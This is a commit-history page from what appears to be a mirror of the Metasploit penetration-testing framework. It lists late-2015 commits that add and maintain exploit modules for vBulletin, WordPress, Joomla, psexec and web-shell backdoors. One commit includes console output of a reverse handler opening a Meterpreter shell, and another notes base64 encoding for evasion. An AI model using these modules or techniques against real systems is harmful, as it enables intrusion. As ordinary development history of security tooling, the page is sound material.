adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
55,054 Commits 27 Branches 1,043 Tags
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
Commit Graph

13654 Commits

Author SHA1 Message Date
William Vu 3cae7999aa Prefer ctype over headers['Content-Type'] 2015-11-06 14:36:21 -06:00
wchen-r7 f957acf9ba Fix Framework Rspec Failure 
Needs to do:
include Msf::Exploit::Remote::HTTP::Wordpress
 2015-11-06 13:56:05 -06:00
wchen-r7 fb9a40f15c Land #6103, Add WordPress Plugin Ajax Load More Auth File Upload Vuln 2015-11-06 13:18:48 -06:00
wchen-r7 73f630b25a Note default.php 2015-11-06 13:18:24 -06:00
jvoisin f93f3397ec Fix some mistakes pointed by @wchen-r7 2015-11-06 19:35:22 +01:00
jvoisin c540ca763c Add the EDB id 2015-11-06 17:21:28 +01:00
jvoisin 7998955b46 The double-quote character is a badchar 2015-11-06 16:43:53 +01:00
jvoisin 30e7a35452 Add the possibility to target non-default path 2015-11-06 15:33:30 +01:00
jvoisin bb0e64e541 Implement a module for the recent vBulletin RCE 
This module implements the recent unserialize-powered RCE against
vBulletin 5.1.X

Step to reproduce:

1. Install vBulletin 5.1.X
2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```

```
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```
 2015-11-06 14:59:25 +01:00
wchen-r7 46fac897bd Land #6144, China Chopper Web Shell (Backdoor) module 2015-11-05 18:29:36 -06:00
wchen-r7 ea22583ed1 Update title and description 2015-11-05 18:29:03 -06:00
wchen-r7 27be832c4c remove the fail_with because it's always triggering anyway 2015-11-05 18:19:46 -06:00
dmohanty-r7 a71d7ae2ae Land #6089, @jvazquez-r7 Fix HTTP mixins namespaces 2015-11-05 16:56:41 -06:00
wchen-r7 038cb66937 Use the right module path 2015-11-05 16:16:46 -06:00
Brent Cook ee6d6258a5 Land #6180, add PSH as a target for psexec directly, implement autodetect 2015-11-05 10:38:50 -06:00
pyllyukko 4390fda513 Remove extra Content-Length HTTP header 
The send_request_raw already sets the header and if it's set also in the
module, Metasploit sends the header twice.
 2015-11-05 14:38:06 +02:00
William Vu 862dff964a Integrate psexec_psh into psexec 2015-11-04 17:31:33 -06:00
nixawk 109e9b6b6e remove debug info - require 'pry' 2015-11-03 06:52:11 +00:00
nixawk 46fe0c0899 base64 for evasion purposes 2015-11-03 06:42:52 +00:00
nixawk 6c16d2a1ca caidao's exploit module 2015-11-02 08:54:18 +00:00
William Vu 6a01efa394 Deprecate psexec_psh 2015-10-30 17:41:58 -05:00
Louis Sato 2bd792f693 remove .rb file extension 2015-10-30 15:26:45 -05:00
wchen-r7 82e600a53a Suggest the correct replacement for the deprecated module 
The deprecated module has been suggesting the wrong replacement,
it should be exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
 2015-10-29 16:24:29 -05:00
Louis Sato 57304a30a8 Land #6139, remove bad ref links 2015-10-29 16:00:43 -05:00
wchen-r7 95920b7ff6 Bring back more working links 2015-10-29 15:57:16 -05:00
wchen-r7 da52c36687 Put back some links 2015-10-29 15:48:47 -05:00
nixawk faf9be811a delete caidao_php_backdoor_exec from exploits 2015-10-29 02:18:30 +00:00
nixawk bc02993567 chinese caidao php backdoor command execution 2015-10-28 16:43:58 +00:00
wchen-r7 8757743821 Update description 2015-10-27 17:39:11 -05:00
wchen-r7 cfe9748962 Deprecate exploits/multi/http/uptime_file_upload 
Please use uptime_file_upload_1.rb
 2015-10-27 17:36:54 -05:00
wchen-r7 0c648eb210 Move to modules/exploits/multi/http/uptime_file_upload_2 
This exploit is rather similiar to uptime_file_upload.rb, because
they both abuse post2file to upload. The difference is that this
module requires a priv escalation to be able to upload, and the
other one doesn't.
 2015-10-27 17:31:31 -05:00
wchen-r7 592fdef93d Update uptime_code_exec 2015-10-27 17:29:55 -05:00
wchen-r7 5b86d2ef95 Fix #6133, update description, authors and references 
Fix #6133

Thank you @japp-0xlabs
 2015-10-27 14:38:18 -05:00
wchen-r7 154fb585f4 Remove bad references (dead links) 
These links are no longer available. They are dead links.
 2015-10-27 12:41:32 -05:00
William Vu 74353686a3 Land #6136, rescue SMB error for psexec 2015-10-27 09:31:37 -05:00
jvazquez-r7 b2e3ce1f8a Allow to finish when deletion fails 2015-10-26 16:40:36 -05:00
wchen-r7 9adfd296a0 Land #6128, Th3 MMA mma.php Backdoor Arbitrary File Upload 2015-10-26 15:26:06 -05:00
wchen-r7 0d9ebe13a1 Modify check 2015-10-26 15:25:38 -05:00
wchen-r7 f4abc16c66 Land #6102, Add rsh/libmalloc privilege escalation exploit module 2015-10-26 10:54:05 -05:00
JT 4f244c54f8 Update mma_backdoor_upload.rb 2015-10-26 23:01:38 +08:00
Sam H 5fcc70bea4 Fixed issue w/ msf payloads + added timeout rescue 
Apparently when OS X payload shells get a sudo command, it requires a full path (even though it clearly has $PATH defined in its env...) to that file. The updates here take that into account. Also, the script more directly catches a timeout error when the maximum time for sudoers file to change has passed.
 2015-10-25 23:38:48 -07:00
JT ad80f00159 Update mma_backdoor_upload.rb 2015-10-24 11:16:49 +08:00
JT f461c4682b Update mma_backdoor_upload.rb 2015-10-24 11:15:26 +08:00
wchen-r7 181e7c4c75 Update metadata 2015-10-23 17:22:31 -05:00
wchen-r7 01c2641c6b Change print_* 2015-10-23 16:27:52 -05:00
wchen-r7 3c961f61a7 Modify check to use Nokogiri 2015-10-23 14:29:16 -05:00
wchen-r7 6f02cedff8 Move method create_exec_service 2015-10-23 13:10:00 -05:00
xistence f632dd8f67 Add Joomla Content History SQLi RCE exploit module 2015-10-23 17:25:44 +07:00
Ewerson Guimaraes (Crash) 2828653f8f Update uptime_code_exec.rb 2015-10-23 11:49:21 +02:00
Ewerson Guimaraes (Crash) 5539363218 Update uptime_code_exec.rb 2015-10-23 11:33:59 +02:00